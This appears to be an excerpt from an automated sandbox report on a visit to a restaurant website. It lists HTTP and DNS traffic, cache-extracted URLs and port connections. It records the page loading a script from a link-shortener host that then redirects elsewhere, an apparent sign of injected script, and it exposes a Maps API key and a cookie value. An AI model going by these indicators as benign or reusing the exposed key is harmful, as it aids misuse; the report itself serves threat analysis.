Source: global trafficHTTP traffic detected: GET /contactUs HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_contact_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_contact_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ww1.cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.afghanhayatrestaurant.com.au
Source: global trafficDNS traffic detected: DNS query: cuturls.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ww1.cuturls.net
Source: chromecache_233.2.drString found in binary or memory: http://afghanhayatrestaurant.com.au/
Source: chromecache_223.2.dr, chromecache_375.2.dr, chromecache_313.2.dr, chromecache_393.2.dr, chromecache_269.2.dr, chromecache_347.2.dr, chromecache_415.2.dr, chromecache_293.2.dr, chromecache_264.2.dr, chromecache_410.2.dr, chromecache_402.2.dr, chromecache_265.2.dr, chromecache_465.2.dr, chromecache_287.2.dr, chromecache_228.2.dr, chromecache_216.2.dr, chromecache_467.2.dr, chromecache_240.2.dr, chromecache_326.2.dr, chromecache_422.2.dr, chromecache_447.2.drString found in binary or memory: http://cipa.jp/exif/1.0/
Source: chromecache_368.2.drString found in binary or memory: http://daneden.me/animate
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: http://g.co/dev/maps-no-account
Source: chromecache_428.2.dr, chromecache_335.2.drString found in binary or memory: http://getbootstrap.com/javascript/#affix
Source: chromecache_368.2.drString found in binary or memory: http://opensource.org/licenses/MIT
Source: chromecache_233.2.drString found in binary or memory: http://www.afghanrahimirestaurant.com/dine-in-menu/
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: http://www.broofa.com
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13393
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.jquery.com/ticket/4833
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_320.2.drString found in binary or memory: https://cuturls.net/eWD0j3
Source: chromecache_250.2.drString found in binary or memory: https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6
Source: chromecache_388.2.dr, chromecache_398.2.drString found in binary or memory: https://devcrud.com)
Source: chromecache_388.2.dr, chromecache_398.2.drString found in binary or memory: https://devcrud.com/licenses)
Source: chromecache_365.2.drString found in binary or memory: https://developer.mozilla.org/docs/Web/API/EventTarget/addEventListener
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: https://developers.google.com/maps/deprecations
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/advanced-markers/migration
Source: chromecache_227.2.dr, chromecache_319.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages
Source: chromecache_252.2.dr, chromecache_257.2.dr, chromecache_314.2.dr, chromecache_373.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#
Source: chromecache_365.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/libraries
Source: chromecache_365.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling
Source: chromecache_227.2.dr, chromecache_319.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/webgl/support
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_437.2.dr, chromecache_424.2.dr, chromecache_236.2.dr, chromecache_221.2.dr, chromecache_320.2.drString found in binary or memory: https://fonts.googleapis.com
Source: chromecache_320.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Dancing
Source: chromecache_437.2.dr, chromecache_424.2.dr, chromecache_236.2.dr, chromecache_221.2.dr, chromecache_320.2.drString found in binary or memory: https://fonts.gstatic.com
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLgiuE.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLuiuEViw.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLviuEViw.woff2)
Source: chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/edutasbeginner/v3/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_HwelksD2U.wo
Source: chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/mochiypopone/v10/QdVPSTA9Jh-gg-5XZP2UmU4O9kw1Z2s4ddJCAn_GDDcp0DnAB95uJUL
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/mochiypopone/v10/QdVPSTA9Jh-gg-5XZP2UmU4O9nw3BXo.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6D6MmTpA.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6H6Mk.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6I6MmTpA.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6J6MmTpA.woff2)
Source: chromecache_300.2.dr, chromecache_346.2.drString found in binary or memory: https://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ-6K6MmTpA.woff2)
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://github.com/FezVrasta/popper.js/issues/373).
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://github.com/FezVrasta/popper.js/pull/715
Source: chromecache_256.2.drString found in binary or memory: https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_368.2.drString found in binary or memory: https://github.com/nickpettit/glide
Source: chromecache_256.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://github.com/twbs/bootstrap/issues/24251
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://github.com/whatwg/html/issues/2369
Source: chromecache_387.2.dr, chromecache_256.2.drString found in binary or memory: https://goo.gl/pxwQGp)
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: https://goo.gle/js-api-loading
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/#nonce-attributes
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_372.2.dr, chromecache_281.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/58/6/geometry.js
Source: chromecache_372.2.dr, chromecache_281.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/58/6/main.js
Source: chromecache_372.2.dr, chromecache_281.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/58/6/search.js
Source: chromecache_233.2.drString found in binary or memory: https://maps.googleapis.com/maps/api/js?client=google-maps-embed&amp;paint_origin=&amp;libraries=geo
Source: chromecache_437.2.dr, chromecache_424.2.dr, chromecache_236.2.dr, chromecache_221.2.dr, chromecache_320.2.drString found in binary or memory: https://maps.googleapis.com/maps/api/js?key=AIzaSyCtme10pzgKSPeJVJrG1O3tjR6lk98o4w8&callback=initMap
Source: chromecache_257.2.drString found in binary or memory: https://maps.googleapis.com/maps/api/mapsjs/mapConfigs:batchGet
Source: chromecache_338.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/entity11.png);background-size:70px
Source: chromecache_338.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/entity11_hdpi.png);background-size:70px
Source: chromecache_338.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/exp2.png);background-size:109px
Source: chromecache_338.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/exp2_hdpi.png);background-size:109px
Source: chromecache_233.2.drString found in binary or memory: https://maps.gstatic.com/maps-api-v3/embed/js/58/6/init_embed.js
Source: chromecache_256.2.drString found in binary or memory: https://popper.js.org
Source: chromecache_256.2.drString found in binary or memory: https://popper.js.org/)
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_233.2.drString found in binary or memory: https://search.google.com/local/reviews?placeid=ChIJQ9hSrAkU1moRYsmMbfjyFbI
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drString found in binary or memory: https://support.google.com/fusiontables/answer/9185417).
Source: chromecache_459.2.dr, chromecache_338.2.drString found in binary or memory: https://support.google.com/maps?p=kml
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_454.2.dr, chromecache_423.2.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
Source: chromecache_437.2.dr, chromecache_424.2.dr, chromecache_236.2.dr, chromecache_221.2.dr, chromecache_320.2.drString found in binary or memory: https://www.adagrapro.com.au/
Source: chromecache_257.2.drString found in binary or memory: https://www.google.com
Source: chromecache_320.2.drString found in binary or memory: https://www.google.com/maps/embed?pb=
Source: chromecache_256.2.drString found in binary or memory: https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
